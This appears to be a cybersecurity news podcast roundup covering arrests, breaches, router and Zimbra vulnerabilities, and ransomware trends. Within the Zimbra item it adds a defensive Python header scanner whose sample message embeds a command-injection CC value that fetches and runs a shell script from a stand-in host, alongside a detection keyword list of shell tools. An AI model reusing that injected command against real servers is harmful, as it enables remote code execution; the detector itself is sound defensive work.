Russian cybercriminal arrests, Irish police fined, Rackspace blame game
Subscribe to the Cyber Security Headlines podcast
Spotify, Apple Podcasts, RSS link, add as an Alexa Skill, or search "Cyber Security Headlines" on your favorite podcast app.
In today’s cybersecurity news…
Russian authorities arrest nearly 100 cybercriminals in raid
On Wednesday, Russian authorities announced the arrests of 96 people in connection with an alleged cyber money laundering scheme that leveraged the UAPS payment system and the Cryptex crypto exchange. The announcement included a one-minute video showing authorities breaking down doors, making arrests, and counting large amounts of cash. The scheme netted its operators 3.7 billion rubles, the equivalent of roughly $39 million. The announcement comes less than a week after U.S. authorities unsealed an indictment against two men allegedly connected to UAPS and seized Cryptex exchange domains.
(CyberScoop)
Northern Ireland police fined for exposing officer identities
The Police Service of Northern Ireland (PSNI) has been fined £750,000 ($1 million) after accidentally revealing the identities of all 9,483 of its officers and staff. The data was exposed when the PSNI responded to a request under the Freedom of Information Act and accidentally uploaded a document containing a human resources worksheet to a public portal. The file included surnames and first-name initials, job role, rank, grade, department, location of post, contract type, gender and staff number. The fine comes from the United Kingdom's data protection regulator, the Information Commissioner's Office (ICO), which also oversees the Freedom of Information Act. The ICO said the incident potentially exposed affected individuals to terrorist and criminal groups, "leaving many fearing for their safety."
(The Record)
Rackspace breach sparks vendor blame game
Following up on the story we brought to you yesterday on Cyber Security Headlines: after the enterprise cloud host Rackspace was hacked on September 24, a vendor blame game has kicked off. Initially the Rackspace incident was attributed to a zero-day flaw in ScienceLogic's SL1 monitoring app. However, ScienceLogic is now shifting the blame to an undocumented vulnerability in a different third-party utility bundled with SL1. While ScienceLogic declined to identify the responsible third party, the company said that, upon identifying the flaw, it "rapidly developed a patch to remediate the incident and have made it available to all customers globally." Attackers were able to pivot from the monitoring software to other internal Rackspace servers and compromise sensitive data of users, who have now received breach notices.
(SecurityWeek)
Research reveals vulnerabilities in routers that left 700,000-plus exposed
On Wednesday, researchers at Forescout revealed 14 vulnerabilities in DrayTek routers, more than 700,000 of which are exposed to the public internet. One vulnerability carried a 10.0 CVSS severity score while another was rated 9.1, and the researchers said "these vulnerabilities could be used in espionage, data exfiltration, ransomware, and denial of service (DoS) attacks." Further, 75% of the vulnerable routers are used in commercial settings. More than half of the vulnerable routers (approximately 425,000) are in the European Union and United Kingdom, followed by Asia with just over 25% (190,000), with the remainder residing in Australia and New Zealand (37,000), the Middle East (30,000), Latin America (15,000) and North America (7,200). Network admins are urged to apply patches as soon as possible.
(CyberScoop)
Huge thanks to our sponsor, SpyCloud
FIN7 spreads malware through deepfake nude “generator” sites
FIN7 is believed to have Russian ties and has carried out sophisticated phishing and social engineering attacks since 2013. Researchers spotted FIN7 websites masquerading as AI-powered deepnude generators. The sites allow users to upload photos; after the alleged "deepnude" image is supposedly generated, the user is prompted to click a link to download it. Instead of receiving a new image, the user's device is infected with Lumma Stealer malware, which steals credentials and cookies saved in web browsers, cryptocurrency wallets, and other data. All seven sites detected have since been taken down, but users who downloaded files from them should assume their devices are infected.
Zimbra bug causes alarm after mass exploitation attempts
Multiple cybersecurity agencies in Europe have warned about a vulnerability in Zimbra's email product. Zimbra is a widely used email platform that is a frequent target for both nation-states and cybercriminals. Researchers at Proofpoint said they began seeing exploitation of the latest Zimbra bug (CVE-2024-45519) on September 28. Attackers sent emails spoofing Gmail "sent to bogus addresses in the CC fields in an attempt for Zimbra servers to parse and execute them as commands." Compromised servers were then observed being used to host additional malware. Zimbra has released a patch, and several other experts say they are seeing mass targeting of the bug.
(The Record)
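The Proofpoint observation above, bogus CC addresses built to be executed as shell commands, is the kind of thing a mail gateway or SIEM rule can catch on the wire. The following is an added example, not Proofpoint's or Zimbra's code, of a header scan that strips legitimate quoted display names and then flags any address header still carrying shell metacharacters or a long base64-looking token. The sample messages are constructed for the example (the `payload.invalid` host and the exact CC format are illustrative assumptions, not the real exploit string), and the thresholds and keyword list are assumptions to tune for your own mail flow.

```python
"""
Heuristic scan of mail address headers for command-injection shapes.
Added example; not Proofpoint's or Zimbra's code. Stdlib only.
"""
import email
import re

# Display names such as  "Smith, John (Sales)" <...>  legitimately contain
# commas, quotes and parentheses, so strip a quoted string only when it is
# immediately followed by an angle-bracket address.
DISPLAY_NAME = re.compile(r'"(?:[^"\\]|\\.)*"\s*(?=<)')

# Characters that drive shell command injection and have no business in an
# address once display names are gone. Assumption: RFC 5322 comments and
# quoted local-parts are rare enough on your mail flow to flag as well.
SHELL_META = re.compile(r'[$`|;&(){}\\]')

# Tokens typical of a download-and-execute payload; only reported as extra
# context once a stronger indicator has already fired (assumption).
PAYLOAD_WORDS = re.compile(r'(?i)\b(curl|wget|base64|sh|bash|python|perl)\b')

# A long base64-looking run where a mailbox name should be (assumption: 32+).
B64_RUN = re.compile(r'[A-Za-z0-9+/]{32,}={0,2}')

ADDRESS_HEADERS = ("cc", "to", "from", "reply-to")


def scan_headers(raw_message: str):
    """Return [(header, raw value, [reasons]), ...] for suspicious address
    headers in one RFC 5322 message; an empty list means nothing flagged."""
    msg = email.message_from_string(raw_message)  # compat32: plain str values
    findings = []
    for hdr in ADDRESS_HEADERS:
        for value in msg.get_all(hdr, []):
            body = DISPLAY_NAME.sub("", value)
            reasons = []
            if SHELL_META.search(body):
                reasons.append("shell metacharacters")
            if B64_RUN.search(body):
                reasons.append("long base64-like token")
            if reasons and PAYLOAD_WORDS.search(body):
                reasons.append("command-like tokens")
            if reasons:
                findings.append((hdr, " ".join(value.split()), reasons))
    return findings


# Constructed sample messages (not captured traffic).
BENIGN = """\
From: "Smith, John (Sales)" <john.smith@example.com>
To: helpdesk@example.org
Cc: "O'Brien, Pat" <pat.obrien@example.com>, audit@example.org
Subject: Q3 figures

Attached.
"""

INJECTION = """\
From: "Google Alerts" <alerts@gmail.com>
To: admin@example.org
Cc: "aabbcc"@example.org, $(curl http://payload.invalid/x.sh|sh)@example.org
Subject: Important

Please review.
"""

ENCODED = """\
From: billing@example.net
To: admin@example.org
Cc: QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFB@example.org
Subject: Invoice

See attached.
"""

if __name__ == "__main__":
    for label, sample in (("benign", BENIGN), ("injection", INJECTION),
                          ("encoded", ENCODED)):
        for hdr, value, reasons in scan_headers(sample):
            print(f"[{label}] {hdr}: {value}  <- {', '.join(reasons)}")
```

Run it against the raw message as it arrives at the MTA (before Zimbra's own parsing), or feed it archived headers from a SIEM; a hit on the CC header with "shell metacharacters" is the signal to pull the full message and check the Zimbra host for follow-on activity, since the article notes compromised servers were reused to host further malware.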
Manufacturers rank as ransomware’s biggest target
According to a study from Black Kite, the manufacturing sector is more than three times as likely as other sectors to suffer a ransomware attack and accounts for 21% of all ransomware incidents. Of the 5,000 companies examined, 80% of manufacturing companies have vulnerabilities rated "critical" under CVSS, and 67% of those companies have at least one vulnerability listed in the Known Exploited Vulnerabilities (KEV) catalog maintained by the Cybersecurity and Infrastructure Security Agency (CISA). The researchers said threat actors are aware of the weak links posed by manufacturers and that "these companies play critical roles within global supply chains." The researchers said that manufacturers should focus on patch management for internet-facing assets, addressing exposed credentials, and better securing their web applications.
(Dark Reading)
FCC offering $200 million to protect schools and libraries from hackers
The Federal Communications Commission is offering up to $200 million through the Schools and Libraries Cybersecurity Pilot Program. K-12 schools and libraries will be able to seek reimbursement for things like advanced firewalls, identity protection and authentication services, malware protection, and VPNs. The FCC says it expects to open the application process this fall and will select a mix of schools and libraries, with added emphasis placed on funding projects from low-income and Tribal applicants. The pilot program will be used to evaluate whether to fund this kind of program on a more permanent basis.
(The Verge)